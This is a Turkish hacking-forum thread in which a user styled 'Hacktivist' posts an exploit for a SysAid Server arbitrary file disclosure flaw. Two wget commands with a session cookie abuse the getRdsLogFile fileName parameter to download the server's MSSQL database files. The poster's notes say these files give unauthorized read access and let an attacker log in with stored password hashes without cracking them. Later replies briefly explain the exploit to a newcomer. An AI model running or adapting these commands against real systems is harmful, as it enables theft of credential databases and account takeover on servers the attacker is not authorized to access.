Konuyu Oyla:
  • Toplam: 1 Oy - Ortalama: 5
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: SysAid Server Arbitrary File Disclosure
KingSkrupellos
*
avatar
Hacktivist
Durum: Çevrimdışı
Seviye Puanı: 56
Yaşam Puanı: 1,385 / 1,385
Deneyim: 43 / 100
Rep Sayısı: 2873
Mesaj Sayısı: 6502
Üyelik Tarihi: 21.08.2013
     
Yorum: #1
SysAid Server Arbitrary File Disclosure
20.04.2015 21:08
Exploit =>
Kod:
wget -O "ilient.mdf" --header="Cookie:
JSESSIONID=1C712103AA8E9A3D3F1D834E0063A089" \
"http://sysaid.example.com/getRdsLogFile?fileName=c:\\\\Program+Files\\\\SysAidMsSQL\\\\MSSQL10_50.SYSAIDMS​SQL\\\\MSSQL\\DATA\\\\ilient.mdf"

wget -O "ilient.ldf" --header="Cookie:
JSESSIONID=1C712103AA8E9A3D3F1D834E0063A089" \
"http://sysaid.example.com/getRdsLogFile?fileName=c:\\\\Program+Files\\\\SysAidMsSQL\\\\MSSQL10_50.SYSAIDMS​SQL\\\\MSSQL\\DATA\\\\ilient_log.LDF"

Not => Saldırganlar için Sysaid Serverdaki siteler yetkili olmayan dosyalara direk okuma erişimi sağlıyor.Buraya giren kişi sitedeki kullanıcı hesaplarını değiştirebilir ve önemli sistem dosyalarını sadece okuyabilme ve indirebilme yetkisine sahip oluyorlar.

Not 2 => SysAid server veritabanı dosyalarınıa kullanıcı ve yönetici veya herhangi bir ID ile şifre hashını kullanarak direk girebilirsiniz. Hash kırmaya gerek yoktur.
(Bu konu en son: 20.04.2015 Tarihinde, Saat: 21:08 düzenlenmiştir. Düzenleyen: KingSkrupellos.)
atakas
*
avatar
Yüzbaşı
Durum: Çevrimdışı
Seviye Puanı: 9
Yaşam Puanı: 15 / 216
Deneyim: 65 / 100
Rep Sayısı: 2
Mesaj Sayısı: 113
Üyelik Tarihi: 09.04.2015
     
Yorum: #2
Cvp: SysAid Server Arbitrary File Disclosure
21.04.2015 01:46
Bu Nedir Ustam
KingSkrupellos
*
avatar
Hacktivist
Durum: Çevrimdışı
Seviye Puanı: 56
Yaşam Puanı: 1,385 / 1,385
Deneyim: 43 / 100
Rep Sayısı:
Mesaj Sayısı: 6502
Üyelik Tarihi: 21.08.2013
     
Yorum: #3
RE: SysAid Server Arbitrary File Disclosure
21.04.2015 15:02
(21.04.2015 01:46)atakas Nickli Kullanıcıdan Alıntı:  Bu Nedir Ustam

Bu kod exploit kodlar. Yani Sysaid kurulu sitelerde yetkili olmadğın halde sitedeki dosyaları sanki yetkiliymişssin okumanı ve sistem üzerindeki dosyaları okumanı sağlar. Yeni başlıyorsun buna hiç dokunma derim.
atakas
*
avatar
Yüzbaşı
Durum: Çevrimdışı
Seviye Puanı: 9
Yaşam Puanı: 15 / 216
Deneyim: 65 / 100
Rep Sayısı:
Mesaj Sayısı: 113
Üyelik Tarihi: 09.04.2015
     
Yorum: #4
RE: SysAid Server Arbitrary File Disclosure
21.04.2015 18:52
(21.04.2015 15:02)KingSkrupellos Nickli Kullanıcıdan Alıntı:  
(21.04.2015 01:46)atakas Nickli Kullanıcıdan Alıntı:  Bu Nedir Ustam

Bu kod exploit kodlar. Yani Sysaid kurulu sitelerde yetkili olmadğın halde sitedeki dosyaları sanki yetkiliymişssin okumanı ve sistem üzerindeki dosyaları okumanı sağlar. Yeni başlıyorsun buna hiç dokunma derim.
Yeni Başlıyorum ve dokunmayacam Exciting



1 Ziyaretçi